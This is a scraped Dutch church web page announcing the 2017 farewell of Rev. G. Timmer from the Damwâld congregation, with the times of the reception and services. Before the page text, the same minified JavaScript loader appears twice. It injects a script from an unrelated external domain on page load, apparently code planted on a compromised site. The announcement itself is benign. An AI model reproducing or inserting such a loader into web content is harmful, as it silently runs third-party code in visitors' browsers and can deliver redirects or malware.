;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheid ds. G. Timmer - PKN Damwâld
24 maart 2017
16:00 t/m 18:00
't Skûlplak
Afscheid ds. G. Timmer

Na bijna 6 jaar verbonden te zijn geweest aan Hervormd Akkerwoude c.a. gaat ds. G. Timmer ons per 26 maart 2017 verlaten en zal hij officieel in zijn nieuwe gemeente in Twijzelerheide intrede doen als predikant.

Op vrijdag 24 maart van 16.00 uur tot 18.00 uur is er in ‘t Skûlplak voor een ieder gelegenheid om de familie Timmer de hand te schudden. Dit alles onder het genot van een hapje en een drankje. Uiteraard is er aan kinderopvang gedacht en alle kinderen zijn dan ook van harte uitgenodigd. Op zondag 26 maart 2017 zal om 09.30 uur de afscheidsdienst plaatsvinden in De Ikker.

Zondagmiddag 26 maart om 14.00 uur is de bevestigings- en intrededienst van ds. Timmer in de Hervormde Kerk aan de Smitswei 1 in Twijzelerheide. Ook daar bent u van harte welkom!

Wij bidden ds. Timmer en zijn gezin Gods onmisbare zegen toe bij de overstap naar en zijn werk in de Hervormde gemeente te Twijzelerheide. Dat hij met vrucht en vreugde in de gemeente van Twijzelerheide mag werken.

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld